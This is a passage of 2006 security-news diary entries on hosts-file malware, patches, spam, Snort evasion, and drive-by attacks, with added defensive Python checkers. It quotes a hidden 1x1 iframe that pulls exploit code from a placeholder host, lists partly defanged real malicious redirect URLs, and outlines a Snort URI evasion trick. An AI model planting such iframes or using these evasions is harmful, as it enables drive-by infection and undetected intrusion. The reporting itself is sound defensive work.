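    A watched domain is reported whatever address it is pinned to, because
    any pin overrides DNS for it.  Every other name is reported only when it
    is sunk to a loopback or unspecified address, which is how the hosts
    file described above silenced the .biz competition.
    """
    flagged = []
    for ip, host in parse_hosts(text):
        if host == "localhost":
            continue
        if host in watched:
            flagged.append((host, "watched domain pinned to %s" % ip))
        elif ip.is_loopback or ip.is_unspecified:
            flagged.append((host, "sinkholed to %s" % ip))
    return flagged


if __name__ == "__main__":
    for host, reason in suspicious_entries(SAMPLE_HOSTS):
        print("%-32s %s" % (host, reason))
```

Run it against the real file (C:\Windows\system32\drivers\etc\hosts on the systems the diary discusses) and alert on any non-empty result.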

Removal? Well, once you deal with dozens of pieces of malware embedding themselves left and right, your luck in getting it off painlessly has run out.

Finding all that went wrong is very hard, as you might be looking at malware being pulled in that changes between the time the machine got it and the time you go and get it again, potentially changing (and thus invalidating) much of the results.

Proactively keeping all systems up to date is good and helps, but making sure the really secret stuff cannot reside on, or even be consulted from, a machine that is somehow connected to the Internet is a good step as well. A good place to build this is a data classification (or rather, data handling) policy. Define the most critical information assets and isolate them.

At this point we have not yet identified the initial infection vector.

Bojan Zdrnja
Swa Frantzen


Published: 2006-06-06


GD is a graphics library often used to create or manipulate images on the fly in websites.

Details about a vulnerability (and exploit) have been released on Full Disclosure that claim to cause the library to run into an infinite loop while decoding crafted images. It's clear that, when used, this will lead to severely degraded performance of web servers.

No patch is available so far; monitor http://www.boutell.com/gd/ if you use it in a vulnerable fashion.

Thanks Jim!

Swa Frantzen - Section 66


Published: 2006-06-06

JavaScript file upload entry

A Full Disclosure post today had an exploit that used JavaScript in browsers to selectively "steal" keystrokes from the typing user and channel them into the file upload field.  So as long as you type enough, they could make you type the filename they were after as well.

While this attack needs more to become somewhat effective (like making the user type the needed letters), it once again shows the dangers of running JavaScript. Your best choice if you use e.g. Firefox is to use something like NoScript. It allows you to turn JavaScript off by default and turn it on as needed for selected sites (those where the webmaster doesn't care about users not wanting to expose themselves to randomly downloaded executable content).

Apparently both Firefox and MSIE suffer from this.

Swa Frantzen - Section 66


Published: 2006-06-06

Spamassassin - upgrade

Before you write to us: nope, this is unlikely to be related to the "spam spam spam" article I wrote earlier.

SpamAssassin has two new releases out. They fix vulnerabilities that, given specific command line options, open up SpamAssassin to remote command execution as the user it is running as.

Solution: upgrade to version 3.06 or 3.1.3 as soon as possible, or, as a workaround, do not use the vulnerable command line combination (apparently both "--vpopmail" and "-P" (paranoid) need to be turned on).

Thanks to fellow handlers Jim and Patrick.

If you do take the time to upgrade, I'd suggest making sure you run it as a user that has hardly any rights and/or chroot it.

Swa Frantzen - Section 66


Published: 2006-06-06

Spam - spam - spam

A new twist in spammer tactics is being reported, although we're not sure what their goal is at the moment.

Users report receiving messages appearing to originate from themselves, with only numbers as subject and body.

The body does appear to be HTML encoded, but it's so basic as to not pose a threat so far.

It would be a good idea to investigate whether you can drop email that appears to be from your own organization while originating outside of it. If your users do not send such email (e.g. because they use a VPN to connect back to the inside while on the road), dropping that email might cut down on a few spams.
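The check suggested above, as an added example that is not part of the original diary: it decides whether a message's From: claims our own domain while the client that handed it to our MX sat outside our networks. The domain, the internal address ranges and both messages are constructed for this example, and it assumes our border MX writes the topmost Received header with the client address in square brackets.

```python
import ipaddress
import re
from email import message_from_string
from email.utils import parseaddr

# Assumed for this example: our mail domain and the ranges (office LAN, VPN
# pool) from which our own users legitimately hand mail to the MX.
OUR_DOMAIN = "example.org"
INTERNAL_NETS = [ipaddress.ip_network("192.0.2.0/24")]

# Constructed messages modelled on the 'numbers spam' pattern described above.
SPOOFED = """\
Received: from [198.51.100.23] (helo=mail.example.org)
\tby mx.example.org with esmtp id 1AbCdE-0001; Tue, 06 Jun 2006 09:12:31 +0000
From: alice@example.org
To: alice@example.org
Subject: 384921

483921
"""

LEGITIMATE = """\
Received: from [192.0.2.10] (helo=laptop.example.org)
\tby mx.example.org with esmtp id 1AbCdE-0002; Tue, 06 Jun 2006 09:14:02 +0000
From: Alice <alice@example.org>
To: bob@example.org
Subject: Notes from the meeting

See attached.
"""


def first_hop_ip(msg):
    """Address of the client that handed the message to our MX.

    Only the topmost Received header is trusted: our own server wrote it,
    while any lower ones arrived with the message and can be forged.
    """
    received = msg.get_all("Received") or []
    if not received:
        return None
    match = re.search(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]", received[0])
    return ipaddress.ip_address(match.group(1)) if match else None


def sender_domain(msg):
    """Domain part of the From: address, lower-cased ('' when unparsable)."""
    _, addr = parseaddr(msg.get("From", ""))
    return addr.rpartition("@")[2].lower()


def is_spoofed_internal_sender(raw, our_domain=OUR_DOMAIN, internal=INTERNAL_NETS):
    """True when From: claims our domain but the delivering client was outside.

    Messages without a recorded client (e.g. locally submitted) are left to
    other checks rather than dropped.
    """
    msg = message_from_string(raw)
    if sender_domain(msg) != our_domain:
        return False
    ip = first_hop_ip(msg)
    if ip is None:
        return False
    return not any(ip in net for net in internal)


if __name__ == "__main__":
    for label, raw in (("spoofed", SPOOFED), ("legitimate", LEGITIMATE)):
        print(label, "->", "drop" if is_spoofed_internal_sender(raw) else "accept")
```

If roaming users submit mail over the Internet with SMTP authentication instead of a VPN, exempt authenticated sessions before applying this rule.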

Some fun while on this subject (it's a Tuesday after a 3 day weekend in some countries):
All relations to the SPAM luncheon meat product are purely accidental, even if the term was inspired by a 1975 sketch from Monty Python. Most of us think spam started back in 1994 when two lawyers advertised their green card scam in each and every Usenet newsgroup. Some digging around revealed much earlier attempts in 1978 on the precursor to the modern Internet. It just goes to show you're never around too long to learn something new.

Swa Frantzen - Section 66


Published: 2006-06-05

Farewell 6Bone

After 10 years, today (6/6/06, yes, I'm not going to make any snide remarks about the date), the experimental IPv6 network 6Bone is going dark.  There is now enough real IPv6 infrastructure that the venerable 6Bone is no longer necessary.

Jim Clausing, jclausing at isc dot sans dot org


Published: 2006-06-05

Snort URL evasion vulnerability patched and version 2.6.0 available

The Snort NIDS (http://www.snort.org) vulnerability that was discussed last week (http://isc.sans.org/diary.php?storyid=1373) has been addressed by the Snort team. The latest version, 2.4.5, fixes two vulnerabilities that might have allowed an attacker to send malicious web requests undetected by Snort. Get it at snort.org.

Late breaking news flash! Snort 2.6.0 is out. According to Jennifer Steffens of Sourcefire, the new release includes:
  • Tcp stream properly reassembled after failed sequence check, which may lead to possible detection evasion.
  • Added configurable stream flushpoints.
  • Improved rpc processing.
  • Improved portscan detection.
  • Improved http request processing and handling of possible evasion cases.
  • Improved performance monitoring.
There is also dynamic rules processing and a new version numbering scheme. http://www.snort.org/pub-bin/snortnews.cgi


Published: 2006-06-05

Windows Alternate Data Streams Revisited

An oldie but goodie has reared its familiar head, this time in the manner of a posting to the Bugtraq and Full Disclosure lists. Windows NTFS supports multiple streams of data for any given file (http://support.microsoft.com/kb/105763). While the functions that access ADSs are clearly defined by Microsoft, very few Windows tools can view these alternate data streams (ADS) without some added help. In addition, many third-party software developers ignore the possible presence of ADSs, thus providing a wonderful storage location for malicious code.

The Bugtraq posting http://www.securityfocus.com/archive/1/435962/30/0/threaded mentions a few antivirus tools that fail to detect known malware when stored as ADSs. The Internet Storm Center has not tested any of these claims, but we have no reason to dispute them as we have seen this time and time again.

Ryan Means wrote an excellent paper (GCFW honors) that discusses Alternate Data Streams in depth, presents a number of tools to locate and manipulate ADSs, and presents an extension to Windows Explorer to directly report the presence of ADSs. You can pull it from the SANS Reading Room at: http://www.sans.org/rr/whitepapers/honors/1503.php


Published: 2006-06-04

Hidden IFrame Remains Popular With Browse-By Exploit Authors

ISC reader Glenn Jarvis wrote in to tell us about a website that installs a malicious executable in the temporary folder of the victim's system. A look at the source code of the website's top page revealed a tiny IFrame tag that retrieved another page from a remote server. The size of the in-line frame is 1 pixel by 1 pixel, so it is not visible to the visitor of the site unless the person looks at the source code:

<iframe src= http://remote.example.com/index.html frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe><html>

The remote server's index.html file contained JavaScript code that attempted to exploit a recent Internet Explorer vulnerability to download, install, and run a malicious executable on the website visitor's computer. The executable was recognized by about half of anti-virus tools as a spyware trojan, and was assigned names such as Downloader-ASQ, TR/Spy.Small.EE.2, Win32/SillyDL.2fy, Trojan.Spy.Win32.Small, and Downloader.

The exploit itself targeted a vulnerability that was patched in the update to Internet Explorer that Microsoft released on April 11, 2006. Microsoft Security Bulletin MS06-014 briefly describes the problem:

Vulnerability in the Microsoft Data Access Components (MDAC) Function Could Allow Code Execution (911562)

A remote code execution vulnerability exists in the RDS.Dataspace ActiveX control that is provided as part of the ActiveX Data Objects (ADO) and that is distributed in MDAC. An attacker who successfully exploited this vulnerability could take complete control of an affected system.

Cumulative Security Update for Internet Explorer (912812), which was also released on April 11th, according to Microsoft Security Bulletin MS06-013, strengthens security settings for the Internet zone on Internet Explorer. These settings render the exploit ineffective even if the potential victim did not apply the 911562 patch referenced above. The cumulative update sets the following settings to Disable:
  • Initialize and script ActiveX controls not marked as safe for scripting
  • Access data sources across domains
The exploit we observed operates by instantiating a series of objects, including Microsoft.XMLHTTP, Adodb.Stream, and WScript.Shell. When looking for correlating activities related to this exploit, we came across web forum discussions that suggest that this exploit existed as early as April 26th, two weeks after the release of Microsoft's patch.

Hidden IFrame elements continue to be a popular way for targeting website visitors. After breaking into a server, the attacker modifies its HTML code, using a hidden IFrame tag to retrieve exploit code from another system. Maintainers of the compromised website typically don't know that they are infecting their visitors for quite some time.
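As an added example (not the diary's or the reader's code), a small scanner for the pattern described above: it parses a captured page and reports iframes that are 1x1 or display:none and whose src points off-site. The sample page and host names are constructed; remote.example.com is the placeholder the diary itself uses.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Page source as it might be captured from a compromised site (constructed
# sample).  The first iframe mirrors the tag shown in the diary.
SAMPLE_PAGE = """<html><body>
<h1>Welcome</h1>
<iframe src= http://remote.example.com/index.html frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe>
<iframe src="/help/faq.html" width="600" height="400"></iframe>
<iframe src="http://cdn.example.net/widget" style="display: none"></iframe>
</body></html>"""


def _tiny(value):
    """True when a width/height attribute is 0 or 1 pixel ("1", "1px", "0")."""
    if value is None:
        return False
    digits = "".join(ch for ch in value if ch.isdigit())
    return digits != "" and int(digits) <= 1


class HiddenIframeFinder(HTMLParser):
    """Collects iframes that are effectively invisible and point off-site."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k.lower(): v for k, v in attrs}
        src = (a.get("src") or "").strip()
        # A relative src stays on the site being scanned.
        host = (urlparse(src).hostname or self.site_host).lower()
        style = (a.get("style") or "").replace(" ", "").lower()
        hidden = (_tiny(a.get("width")) and _tiny(a.get("height"))) \
            or "display:none" in style
        if hidden and host != self.site_host:
            self.findings.append({
                "src": src,
                "host": host,
                "width": a.get("width"),
                "height": a.get("height"),
            })


def find_hidden_iframes(html, site_host):
    """Return the hidden, off-site iframes found in html for a page on site_host."""
    parser = HiddenIframeFinder(site_host)
    parser.feed(html)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    for f in find_hidden_iframes(SAMPLE_PAGE, "www.example.org"):
        print("hidden iframe ->", f["src"])
```

Run it over your own pages from a periodic crawl; a hidden frame to a host you do not control is the sign that the site was modified as the paragraph above describes.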

Lenny Zeltser
ISC Handler on Duty


Published: 2006-06-03

Non-standard Incident Prediction

We are all familiar with the use of firewall logs, intrusion detection alerts, antivirus warnings, and watching for "funny" entries in our system logs as ways to indicate that somebody on the Internet is up to no good.  But those traditional detection systems don't do any good against attacks that are not oriented on one of the traditional seven layers of the OSI model.

For example, consider what we witnessed last year following the Katrina and Rita hurricanes that struck the southern coast of the USA.  Within 24 hours of landfall, the Internet Storm Center observed a dramatic increase in fraudulent web sites aimed at good-hearted people wanting to donate to charities or relief efforts.  We can predict with fairly high certainty that the same thing is going to happen again this year.  We are monitoring DNS registrations and have seen several new names appear in the last few weeks with the strings "alberto", "beryl", "donation", or "hurricane" in them.  (Alberto and Beryl are the first two names on the list for 2006.)  Are they all legitimate?  Well, let's see what happens as soon as the first storm forms and makes landfall.

In fact, one of our observant readers (thanks, George!) wrote us to say, "I work in a government research lab with a very diverse user population, including many soccer fans.  The last World Cup led to a malware spike.  I expect another spike this year, but with a potential for more sophisticated attacks."  So George is keeping an eye out for a potential rise in malware attacks, basing his prediction on the fact that during the World Cup many fraudsters and pranksters will likely launch specially crafted emails and set up bogus web sites designed to lure in sports fans around the world.

It's important to recognize that a large percentage of today's Internet attacks are oriented on fraud and criminal activity, and that the criminals will use any event or circumstance to "hack layer eight" as I like to say when I teach SANS Security Essentials.  (Layer eight is the "carbon layer" that sits on top of layer seven, application.)

So what are you doing to protect your layer eight from future incidents?  Do you have early warning and detection devices in place?  Are you educating your users and arming them to defend themselves and your networks against con-jobs aimed directly at them?  Do you have not just good, but GREAT, organizational policy in place?  Remember, the first step in incident handling is Preparation, and the time to start preparing is now.

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2006-06-03

News From Microsoft

Microsoft issued additional information on the Word vulnerability.  The patch is still scheduled for release on Tuesday, June 13.

Thanks, David, for bringing this to our attention.


Published: 2006-06-02

Firefox and Thunderbird released

Versions of both Thunderbird and Firefox were released by the Mozilla Corporation today.  The release notes state that each contained "several security fixes", but the known vulnerabilities page hasn't been updated yet, so we don't know exactly what they are.

Jim Clausing, jac --at-- isc dot sans dot org


Published: 2006-06-01

Something new on Telnet?

We just got a report about massive scans for Telnet (port 23).
Checking on DShield, something is odd there too...
My question is, are you observing something different in your IDS/FW logs on this port?

Handler on Duty: Pedro Bueno ( pbueno && isc. sans. org)


Published: 2006-06-01

Invision Board being exploited

On May 21st we reported a vulnerability in Invision Power Board. To be honest I didn't know much about it, or about the number of sites using it. Well, now I know at least a BIG one that was using it as a forum for its customers. We are still contacting the website owner, so I won't mention it here. But the fact is that it was vulnerable and was exploited.
Now, when you visit it, it will try to push a .wmf exploit to you.

The iframes on that page were redirecting to HTTP : //  traffweb1.biz/dl/adv771.php and HTTP :   // 2-extreme.biz/traff.php?adv=54 .

Those websites were redirecting to HTTP : //  and HTTP : // .

Which would try to push the .WMF exploit to you...

Fortunately, all AV vendors at Virustotal recognize the exploit, and at least McAfee and Symantec will trigger an alert when you are visiting this forum page.

Handler on Duty: Pedro Bueno ( pbueno /&&/ isc. sans. org )


Published: 2006-06-01

F-Secure web console buffer overflow

The folks at F-Secure issued a bulletin today highlighting a buffer overflow in the web console feature of F-Secure Anti-Virus for Microsoft Exchange and F-Secure Internet Gatekeeper.  F-Secure rates this vulnerability as high in cases where the web console is configured to only allow connections from localhost or specific trusted hosts, and critical if it is configured to allow connections from all hosts.  They have released patches; the table below is taken directly from their advisory.

Patch availability:

Product                                      Versions           Hotfix ID   Download
F-Secure Anti-Virus for Microsoft Exchange   6.40                           Apply hotfix for F-Secure Anti-Virus for Microsoft Exchange 6.40:
F-Secure Internet Gatekeeper                 6.50                           Upgrade to F-Secure Internet Gatekeeper 6.60
                                                                            Apply hotfix for the F-Secure Internet Gatekeeper 6.50:
F-Secure Internet Gatekeeper                 6.42, 6.41, 6.40               Upgrade to F-Secure Internet Gatekeeper 6.60

Jim Clausing, jclausing /at\ isc dot sans dot org


Published: 2006-06-01

Snort bypass vulnerability

Update: (2006-06-01 16:10 UTC) Sourcefire/snort.org has issued its statement on the issue (patches coming Monday, 5 June):

Demarc just released a vulnerability alert on Snort. The vulnerability leads to evasion of URI content rules: when a carriage return is added to the end of a URL (before the HTTP protocol declaration), Snort detection can be evaded. According to the alert, this vulnerability affects thousands of detection rules in the standard rule base. No need to panic at the moment though, as the folks at Sourcefire have fixed this in version 2.6.0 and we haven't seen this kind of traffic in the wild yet. Thanks to Blake Hartstein for reporting this to us.  Also, thanks to our friends at Sourcefire for info on the extent of the problem and about the upcoming patch.

Please refer to the vulnerability alert for more details,


Published: 2006-06-01

More on Symantec vulnerabilities

The latest patches from Symantec are causing quite a bit of confusion. To reiterate what Kevin wrote in his diary (http://isc.sans.org/diary.php?storyid=1368):

*ALL* versions of 10.0.x and 10.1.x of Symantec Antivirus Corporate Edition and 3.0.x and 3.1.x of Symantec Client Security seem to be vulnerable.
Symantec Antivirus Corporate Edition version 8.x and 9.x seem to be ok.

Symantec released 4 patches for each product (http://www.symantec.com/avcenter/security/Content/2006.05.25.html):

Symantec Antivirus Corporate Edition -> (there's a typo here on their web, it's not version 3) -> -> ->

Symantec Client Security -> -> -> ->

Now, if you are running *ANY* other affected version, you will first have to upgrade to one of the versions that has a patch out and then install the patch. I hope this clears up the confusion.

There seem to be some mitigations for the problem though. As eEye stated, this is a remotely exploitable vulnerability. Symantec Antivirus Corporate Edition, when in managed mode, will have the Rtvscan.exe service listening on TCP port 2967. If your host-based firewall is configured to block access to this port (effectively meaning that you can't manage the client from the centralized server, at least not until the client connects to it), you should be OK.
On our test machine, the unmanaged installation of Symantec Antivirus Corporate Edition didn't have any listeners, so it looks like it's safe, at least from a remote exploit over the network (patch in any case!).

If we get more information we'll update the diary. Thanks to Gary for help with this.


Symantec finally posted a nice web page with details on what you have to do depending on the version you're running, at http://service1.symantec.com/SUPPORT/ent-security.nsf/docid/2006052609181248.